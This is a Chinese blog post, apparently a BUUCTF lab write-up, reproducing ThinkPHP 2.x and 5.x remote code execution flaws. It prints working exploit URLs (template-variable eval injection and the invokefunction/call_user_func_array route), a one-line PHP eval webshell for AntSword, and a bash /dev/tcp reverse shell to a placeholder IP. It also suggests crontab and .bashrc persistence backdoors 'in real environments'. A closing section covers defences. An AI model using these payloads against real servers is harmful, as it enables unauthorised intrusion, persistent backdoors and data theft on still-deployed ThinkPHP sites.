

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="bae">
  <meta name="keywords" content="">
  
    <meta name="description" content="ThinkPHP 2.x &amp; 5.x 远程代码执行漏洞复现与利用（基于 BUUCTF）一、前言ThinkPHP 是一个广受欢迎的 PHP 开发框架，但其早期版本（2.x 和 5.0.x 至 5.0.23）因设计缺陷存在严重的远程代码执行（RCE）漏洞。这些漏洞允许攻击者通过精心构造的 URL 参数执行任意 PHP 代码或系统命令，甚至实现服务器完全控制。本文基于 BUUCTF 在线靶场，详">
<meta property="og:type" content="article">
<meta property="og:title" content="ThinkPHP 2.x &amp; 5.x 远程代码执行漏洞复现与利用（基于 BUUCTF）">
<meta property="og:url" content="https://bae-ace.github.io/2025/07/28/ThinkPHP-2-x-5-x-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E4%B8%8E%E5%88%A9%E7%94%A8%EF%BC%88%E5%9F%BA%E4%BA%8E-BUUCTF%EF%BC%89/index.html">
<meta property="og:site_name" content="bae的博客">
<meta property="og:description" content="ThinkPHP 2.x &amp; 5.x 远程代码执行漏洞复现与利用（基于 BUUCTF）一、前言ThinkPHP 是一个广受欢迎的 PHP 开发框架，但其早期版本（2.x 和 5.0.x 至 5.0.23）因设计缺陷存在严重的远程代码执行（RCE）漏洞。这些漏洞允许攻击者通过精心构造的 URL 参数执行任意 PHP 代码或系统命令，甚至实现服务器完全控制。本文基于 BUUCTF 在线靶场，详">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://bae-ace.github.io/img/think.jpg">
<meta property="article:published_time" content="2025-07-28T06:18:44.000Z">
<meta property="article:modified_time" content="2025-07-28T06:32:51.838Z">
<meta property="article:author" content="bae">
<meta property="article:tag" content="Web安全">
<meta property="article:tag" content="漏洞复现">
<meta property="article:tag" content="RCE">
<meta property="article:tag" content="ThinkPHP">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://bae-ace.github.io/img/think.jpg">
  
  
  
  <title>ThinkPHP 2.x &amp; 5.x 远程代码执行漏洞复现与利用（基于 BUUCTF） - bae的博客</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"bae-ace.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":60,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":"CHbSLmwKFof8sHkOvlnoDfza-MdYXbMMI","app_key":"lVqIfnWUAiZZLIag2RoSpxoo","server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2025-07-19T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>bae&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-books"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item dropdown">
              <a class="nav-link dropdown-toggle" target="_self" href="javascript:;" role="button"
                 data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                <i class="iconfont icon-book"></i>
                <span>文档</span>
              </a>
              <div class="dropdown-menu" aria-labelledby="navbarDropdown">
                
                  
                  
                  
                  <a class="dropdown-item" href="https://hexo.fluid-dev.com/" target="_self">
                    
                    <span>主题博客</span>
                  </a>
                
                  
                  
                  
                  <a class="dropdown-item" href="https://hexo.fluid-dev.com/docs/guide/" target="_self">
                    
                    <span>配置指南</span>
                  </a>
                
                  
                  
                  
                  <a class="dropdown-item" href="https://hexo.fluid-dev.com/docs/icon/" target="_self">
                    
                    <span>图标用法</span>
                  </a>
                
              </div>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/AI%E9%A3%8E%E6%99%AF.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="ThinkPHP 2.x &amp; 5.x 远程代码执行漏洞复现与利用（基于 BUUCTF）"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        bae
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-07-28 14:18" pubdate>
           2025 年 07 月 28 日 , 下午 02:18 , 星期一
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          <!-- compatible with older versions-->
          2k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          17 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span>次
        </span>
        
      
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">ThinkPHP 2.x &amp; 5.x 远程代码执行漏洞复现与利用（基于 BUUCTF）</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="ThinkPHP-2-x-5-x-远程代码执行漏洞复现与利用（基于-BUUCTF）"><a href="#ThinkPHP-2-x-5-x-远程代码执行漏洞复现与利用（基于-BUUCTF）" class="headerlink" title="ThinkPHP 2.x &amp; 5.x 远程代码执行漏洞复现与利用（基于 BUUCTF）"></a>ThinkPHP 2.x &amp; 5.x 远程代码执行漏洞复现与利用（基于 BUUCTF）</h1><h2 id="一、前言"><a href="#一、前言" class="headerlink" title="一、前言"></a>一、前言</h2><p>ThinkPHP 是一个广受欢迎的 PHP 开发框架，但其早期版本（2.x 和 5.0.x 至 5.0.23）因设计缺陷存在严重的<strong>远程代码执行（RCE）漏洞</strong>。这些漏洞允许攻击者通过精心构造的 URL 参数执行任意 PHP 代码或系统命令，甚至实现服务器完全控制。本文基于 <strong>BUUCTF</strong> 在线靶场，详细复现 ThinkPHP 2.x 和 5.x 的 RCE 漏洞，涵盖漏洞原理、利用过程、蚁剑连接以及后门植入的可能性，旨在帮助安全从业者和开发者深入理解和防范此类漏洞。</p>
<p>本文将分为两部分：</p>
<ol>
<li><strong>ThinkPHP 2.x RCE 漏洞</strong>：利用模板变量解析缺陷执行代码和命令。</li>
<li><strong>ThinkPHP 5.x RCE 漏洞</strong>：通过框架路由调用任意函数实现代码执行。</li>
</ol>
<hr>
<h2 id="二、ThinkPHP-2-x-RCE-漏洞复现"><a href="#二、ThinkPHP-2-x-RCE-漏洞复现" class="headerlink" title="二、ThinkPHP 2.x RCE 漏洞复现"></a>二、ThinkPHP 2.x RCE 漏洞复现</h2><h3 id="1-靶场环境"><a href="#1-靶场环境" class="headerlink" title="1. 靶场环境"></a>1. 靶场环境</h3><p>BUUCTF 提供在线靶场，无需自行搭建环境。</p>
<ul>
<li><strong>ThinkPHP 2.x RCE 漏洞地址</strong>：<code>https://buuoj.cn/challenges#[ThinkPHP]2-Rce</code><br>开启靶场，访问页面后，通常显示简陋的 ThinkPHP 2.x 欢迎页面，但后台隐藏着强大的远程命令执行能力 。</li>
</ul>
<h3 id="2-漏洞原理"><a href="#2-漏洞原理" class="headerlink" title="2. 漏洞原理"></a>2. 漏洞原理</h3><p>ThinkPHP 2.x 的模板引擎在处理 URL 参数时，直接将参数拼接为模板变量，未进行严格过滤。例如，URL 参数 <code>name=$&#123;@phpinfo()&#125;</code> 会被解析为：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">echo</span> $&#123;@<span class="hljs-title function_ invoke__">phpinfo</span>()&#125; <span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>由于 <code>@phpinfo()</code> 是合法的 PHP 函数调用，服务器会执行 <code>phpinfo()</code> 函数并返回结果。如果结合 <code>eval()</code> 或 <code>assert()</code>，攻击者可通过 GET 或 POST 参数进一步执行任意代码或系统命令，形成完全控制。</p>
<h3 id="3-漏洞利用过程"><a href="#3-漏洞利用过程" class="headerlink" title="3. 漏洞利用过程"></a>3. 漏洞利用过程</h3><h4 id="步骤-1：测试代码执行（POC1）"><a href="#步骤-1：测试代码执行（POC1）" class="headerlink" title="步骤 1：测试代码执行（POC1）"></a>步骤 1：测试代码执行（POC1）</h4><p>使用以下 Payload 测试是否可以执行 PHP 代码：</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ruby"><span class="hljs-symbol">http:</span>/<span class="hljs-regexp">/node3.buuoj.cn:26104/</span><span class="hljs-string">?s</span>=<span class="hljs-regexp">/index/index</span><span class="hljs-regexp">/name/</span><span class="hljs-variable">$&#123;</span><span class="hljs-variable">@phpinfo</span>()&#125;<br></code></pre></td></tr></table></figure>

<p><strong>结果</strong>：页面返回 <code>phpinfo()</code> 的详细信息，证明代码被成功解析执行 。</p>
<h4 id="步骤-2：执行系统命令（POC2）"><a href="#步骤-2：执行系统命令（POC2）" class="headerlink" title="步骤 2：执行系统命令（POC2）"></a>步骤 2：执行系统命令（POC2）</h4><p>利用 <code>eval()</code> 结合 GET 参数执行系统命令（如 <code>ls</code>）：</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc"><span class="hljs-link">http://node3.buuoj.cn:26104/?s=/index/index/name=$&#123;@eval($_GET</span>[<span class="hljs-string">1</span>])&#125;&amp;1=system(%27ls%27);<br></code></pre></td></tr></table></figure>

<p><strong>参数说明</strong>：</p>
<ul>
<li><code>name=$&#123;@eval($_GET[1])&#125;</code>：通过 <code>eval()</code> 执行 GET 参数 <code>1</code> 的内容。</li>
<li><code>1=system(%27ls%27)</code>：执行 <code>system(&#39;ls&#39;)</code>，其中 <code>%27</code> 是 URL 编码的单引号 <code>&#39;</code>。</li>
<li><strong>结果</strong>：页面返回目录列表，例如：<figure class="highlight axapta"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs axapta"><span class="hljs-keyword">index</span>.php<br>flag<br></code></pre></td></tr></table></figure>
说明 <code>ls</code> 命令执行成功。</li>
</ul>
<h4 id="步骤-3：读取-Flag-文件"><a href="#步骤-3：读取-Flag-文件" class="headerlink" title="步骤 3：读取 Flag 文件"></a>步骤 3：读取 Flag 文件</h4><p>尝试读取 <code>/flag</code> 文件内容：</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc"><span class="hljs-link">http://node3.buuoj.cn:26104/?s=/index/index/name=$&#123;@eval($_GET</span>[<span class="hljs-string">1</span>])&#125;&amp;1=system(%27cat%20flag%27);<br></code></pre></td></tr></table></figure>

<p><strong>结果</strong>：页面返回类似以下内容：</p>
<figure class="highlight dust"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dust"><span class="language-xml">flag</span><span class="hljs-template-variable">&#123;xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx&#125;</span><br></code></pre></td></tr></table></figure>

<p>这表明目标服务器已被完全控制 。</p>
<h3 id="4-使用蚁剑连接"><a href="#4-使用蚁剑连接" class="headerlink" title="4. 使用蚁剑连接"></a>4. 使用蚁剑连接</h3><p>为了更方便地操作服务器，可以上传一句话木马并使用蚁剑（AntSword）进行交互。</p>
<h4 id="构造-Payload："><a href="#构造-Payload：" class="headerlink" title="构造 Payload："></a>构造 Payload：</h4><p>使用 POST 参数构造一句话木马：</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc"><span class="hljs-link">http://node3.buuoj.cn:26104/?s=/index/index/name=$&#123;@eval($_POST</span>[<span class="hljs-string">1</span>])&#125;<br></code></pre></td></tr></table></figure>

<p><strong>蚁剑配置</strong>：</p>
<ul>
<li><strong>URL</strong>：<code>http://node3.buuoj.cn:26104/?s=/index/index/name=$&#123;@eval($_POST[1])&#125;</code></li>
<li><strong>密码</strong>：<code>1</code>（对应 <code>$_POST[1]</code>）</li>
<li><strong>类型</strong>：PHP（原生）</li>
<li><strong>编码</strong>：默认</li>
</ul>
<p>连接成功后，可使用蚁剑进行：</p>
<ul>
<li>命令行执行</li>
<li>文件管理（如上传、下载）</li>
<li>终端交互</li>
</ul>
<h3 id="5-进一步操作"><a href="#5-进一步操作" class="headerlink" title="5. 进一步操作"></a>5. 进一步操作</h3><p>在真实环境中，可进行以下高级操作：</p>
<ol>
<li><strong>上传 WebShell</strong>：<ul>
<li>在蚁剑中上传一句话木马（如 <code>&lt;?php @eval($_POST[&#39;pass&#39;]);?&gt;</code>）或冰蝎（Behinder）木马。</li>
<li>保存到可访问路径（如 <code>/var/www/html/shell.php</code>）。</li>
</ul>
</li>
<li><strong>反弹 Shell</strong>：<ul>
<li>在 Kali 上启动监听：<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nc -lvnp 4444<br></code></pre></td></tr></table></figure></li>
<li>在蚁剑中执行：<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">bash -i &gt;&amp; /dev/tcp/你的IP/4444 0&gt;&amp;1<br></code></pre></td></tr></table></figure></li>
</ul>
</li>
<li><strong>持久化后门</strong>：<ul>
<li>添加计划任务（crontab）定时反弹 Shell。</li>
<li>修改 <code>.bashrc</code> 文件，添加后门命令。</li>
<li>写入定时任务（如每分钟执行反弹 Shell）。</li>
</ul>
</li>
</ol>
<hr>
<h2 id="三、ThinkPHP-5-x-RCE-漏洞复现"><a href="#三、ThinkPHP-5-x-RCE-漏洞复现" class="headerlink" title="三、ThinkPHP 5.x RCE 漏洞复现"></a>三、ThinkPHP 5.x RCE 漏洞复现</h2><h3 id="1-靶场环境-1"><a href="#1-靶场环境-1" class="headerlink" title="1. 靶场环境"></a>1. 靶场环境</h3><p>BUUCTF 提供 ThinkPHP 5.x 在线靶场：</p>
<ul>
<li><strong>ThinkPHP 5.x RCE 漏洞地址</strong>：<code>https://buuoj.cn/challenges#[ThinkPHP]5-Rce</code><br>开启靶场，访问页面显示：</li>
</ul>
<figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs armasm"><span class="hljs-symbol">ThinkPHP</span> <span class="hljs-built_in">V5</span><br>十年磨一剑 - 为 API 开发设计的高性能框架<br>[ <span class="hljs-built_in">V5</span>.<span class="hljs-number">0</span> 版本由 七牛云 独家赞助发布 ]<br></code></pre></td></tr></table></figure>

<p>这表明靶场运行 ThinkPHP 5.x（版本 &lt;&#x3D; 5.0.23），漏洞复现环境已就绪 。</p>
<h3 id="2-漏洞原理-1"><a href="#2-漏洞原理-1" class="headerlink" title="2. 漏洞原理"></a>2. 漏洞原理</h3><p>ThinkPHP 5.x 的 RCE 漏洞源于框架对 <code>\think\app::invokefunction</code> 方法的未授权访问。攻击者可通过 URL 参数调用 <code>call_user_func_array</code> 函数，动态执行任意 PHP 函数（如 <code>phpinfo</code>、<code>system</code>），并传递参数。</p>
<p><strong>利用链</strong>：</p>
<figure class="highlight sas"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs sas"><span class="hljs-keyword">index</span>.php<br>└── ?s=<span class="hljs-keyword">index</span>/\think\app/invokefunction<br>        <span class="hljs-variable">&amp;function</span>=call_user_func_array<br>        <span class="hljs-variable">&amp;vars</span>[0]=phpinfo<br>        <span class="hljs-variable">&amp;vars</span>[1][]=-1<br></code></pre></td></tr></table></figure>

<p><strong>参数说明</strong>：</p>
<table>
<thead>
<tr>
<th>参数</th>
<th>含义说明</th>
</tr>
</thead>
<tbody><tr>
<td><code>s</code></td>
<td>ThinkPHP 路由，访问框架核心类</td>
</tr>
<tr>
<td><code>function</code></td>
<td>被调用的函数（如 <code>call_user_func_array</code>）</td>
</tr>
<tr>
<td><code>vars[0]</code></td>
<td>实际调用的函数名称（如 <code>phpinfo</code>、<code>system</code>）</td>
</tr>
<tr>
<td><code>vars[1][]</code></td>
<td>函数参数数组（如 <code>whoami</code>、<code>-1</code>）</td>
</tr>
</tbody></table>
<h3 id="3-漏洞利用过程-1"><a href="#3-漏洞利用过程-1" class="headerlink" title="3. 漏洞利用过程"></a>3. 漏洞利用过程</h3><h4 id="步骤-1：信息探测（测试-phpinfo）"><a href="#步骤-1：信息探测（测试-phpinfo）" class="headerlink" title="步骤 1：信息探测（测试 phpinfo）"></a>步骤 1：信息探测（测试 <code>phpinfo</code>）</h4><p>构造 Payload 测试漏洞：</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc"><span class="hljs-link">http://node5.buuoj.cn:27945/index.php?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars</span>[<span class="hljs-string">0</span>]=phpinfo&amp;vars[1][]=-1<br></code></pre></td></tr></table></figure>

<p><strong>结果</strong>：页面返回完整的 <code>phpinfo()</code> 信息，证明漏洞存在且可利用。</p>
<h4 id="步骤-2：执行系统命令（whoami）"><a href="#步骤-2：执行系统命令（whoami）" class="headerlink" title="步骤 2：执行系统命令（whoami）"></a>步骤 2：执行系统命令（<code>whoami</code>）</h4><p>修改 Payload 执行 <code>whoami</code> 命令：</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc"><span class="hljs-link">http://node5.buuoj.cn:27945/index.php?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars</span>[<span class="hljs-string">0</span>]=system&amp;vars[1][]=whoami<br></code></pre></td></tr></table></figure>

<p><strong>结果</strong>：页面返回：</p>
<figure class="highlight haskell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs haskell"><span class="hljs-title">www</span>-<span class="hljs-class"><span class="hljs-keyword">data</span></span><br></code></pre></td></tr></table></figure>

<p>表明 Web 服务以 <code>www-data</code> 用户运行，命令执行成功。</p>
<h4 id="步骤-3：读取-Flag-文件-1"><a href="#步骤-3：读取-Flag-文件-1" class="headerlink" title="步骤 3：读取 Flag 文件"></a>步骤 3：读取 Flag 文件</h4><p>尝试读取 <code>/flag</code> 或根目录下的 <code>flag</code> 文件：</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc"><span class="hljs-link">http://node5.buuoj.cn:27945/index.php?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars</span>[<span class="hljs-string">0</span>]=system&amp;vars[1][]=cat+/flag<br></code></pre></td></tr></table></figure>

<p>或：</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc"><span class="hljs-link">http://node5.buuoj.cn:27945/index.php?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars</span>[<span class="hljs-string">0</span>]=system&amp;vars[1][]=cat+/var/www/html/flag<br></code></pre></td></tr></table></figure>

<p><strong>结果</strong>：页面返回类似：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">flag</span>&#123;d64e3f2e-xxxx-xxxx-xxxx-<span class="hljs-number">0</span>ed8fe1b43f3&#125;<br></code></pre></td></tr></table></figure>

<h3 id="4-使用蚁剑连接-1"><a href="#4-使用蚁剑连接-1" class="headerlink" title="4. 使用蚁剑连接"></a>4. 使用蚁剑连接</h3><p>与 ThinkPHP 2.x 类似，可构造 POST 参数的一句话木马：</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc"><span class="hljs-link">http://node5.buuoj.cn:27945/index.php?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars</span>[<span class="hljs-string">0</span>]=assert&amp;vars[1][]=eval($_POST[1])<br></code></pre></td></tr></table></figure>

<p><strong>蚁剑配置</strong>：</p>
<ul>
<li><strong>URL</strong>：上述地址</li>
<li><strong>密码</strong>：<code>1</code>（对应 <code>$_POST[1]</code>）</li>
<li><strong>类型</strong>：PHP（原生）</li>
<li><strong>编码</strong>：默认</li>
</ul>
<p>连接后可进行文件管理、命令执行等操作。</p>
<hr>
<h2 id="四、防御措施"><a href="#四、防御措施" class="headerlink" title="四、防御措施"></a>四、防御措施</h2><h3 id="1-升级-ThinkPHP-版本"><a href="#1-升级-ThinkPHP-版本" class="headerlink" title="1. 升级 ThinkPHP 版本"></a>1. 升级 ThinkPHP 版本</h3><ul>
<li><strong>ThinkPHP 2.x</strong>：升级到更高版本（如 3.x 或 5.0.24+），修复模板解析漏洞。</li>
<li><strong>ThinkPHP 5.x</strong>：升级到 5.0.24 或更高版本，官方已修复 RCE 漏洞。</li>
</ul>
<h3 id="2-输入验证与过滤"><a href="#2-输入验证与过滤" class="headerlink" title="2. 输入验证与过滤"></a>2. 输入验证与过滤</h3><ul>
<li><strong>白名单验证</strong>：限制 <code>s</code> 参数和模板变量，只允许预定义值。</li>
<li><strong>过滤危险函数</strong>：禁用 <code>eval</code>、<code>assert</code>、<code>call_user_func_array</code> 等高危函数。</li>
<li><strong>参数校验</strong>：对用户输入进行严格过滤，防止注入。</li>
</ul>
<h3 id="3-禁用危险函数"><a href="#3-禁用危险函数" class="headerlink" title="3. 禁用危险函数"></a>3. 禁用危险函数</h3><p>在 <code>php.ini</code> 中禁用高危函数：</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">disable_functions</span> = eval,assert,exec,system,passthru,shell_exec,proc_open,call_user_func_array<br></code></pre></td></tr></table></figure>

<h3 id="4-最小权限原则"><a href="#4-最小权限原则" class="headerlink" title="4. 最小权限原则"></a>4. 最小权限原则</h3><ul>
<li>配置 Web 服务器以最低权限运行（如非 root 用户）。</li>
<li>限制 PHP 脚本的文件系统访问权限。</li>
</ul>
<h3 id="5-Web-应用防火墙（WAF）"><a href="#5-Web-应用防火墙（WAF）" class="headerlink" title="5. Web 应用防火墙（WAF）"></a>5. Web 应用防火墙（WAF）</h3><ul>
<li>部署 WAF，拦截包含可疑路由（如 <code>\think\app</code>）或函数（如 <code>system</code>）的请求。</li>
<li>使用正则规则匹配异常 Payload。</li>
</ul>
<h3 id="6-安全审计与监控"><a href="#6-安全审计与监控" class="headerlink" title="6. 安全审计与监控"></a>6. 安全审计与监控</h3><ul>
<li>定期扫描 Web 应用，检查已知漏洞。</li>
<li>监控服务器日志，及时发现异常请求。</li>
</ul>
<hr>
<h2 id="五、总结"><a href="#五、总结" class="headerlink" title="五、总结"></a>五、总结</h2><table>
<thead>
<tr>
<th>项目</th>
<th>ThinkPHP 2.x RCE</th>
<th>ThinkPHP 5.x RCE</th>
</tr>
</thead>
<tbody><tr>
<td><strong>漏洞名称</strong></td>
<td>ThinkPHP 2.x RCE</td>
<td>ThinkPHP 5.x RCE</td>
</tr>
<tr>
<td><strong>影响版本</strong></td>
<td>ThinkPHP 2.x</td>
<td>ThinkPHP &lt;&#x3D; 5.0.23</td>
</tr>
<tr>
<td><strong>漏洞原因</strong></td>
<td>模板变量解析未过滤</td>
<td>动态函数调用未授权</td>
</tr>
<tr>
<td><strong>利用方法</strong></td>
<td>GET&#x2F;POST 参数构造 <code>eval</code>&#x2F;<code>assert</code></td>
<td>GET 请求构造路由 + 函数调用</td>
</tr>
<tr>
<td><strong>关键函数</strong></td>
<td><code>eval</code>, <code>assert</code></td>
<td><code>call_user_func_array</code></td>
</tr>
<tr>
<td><strong>检测方式</strong></td>
<td>使用 <code>$&#123;@phpinfo()&#125;</code> 探测</td>
<td>使用 <code>phpinfo</code> 探测，再尝试 <code>system</code></td>
</tr>
<tr>
<td><strong>练习平台</strong></td>
<td>BUUCTF（如 <code>node3.buuoj.cn:26104</code>）</td>
<td>BUUCTF（如 <code>node5.buuoj.cn:27945</code>）</td>
</tr>
</tbody></table>
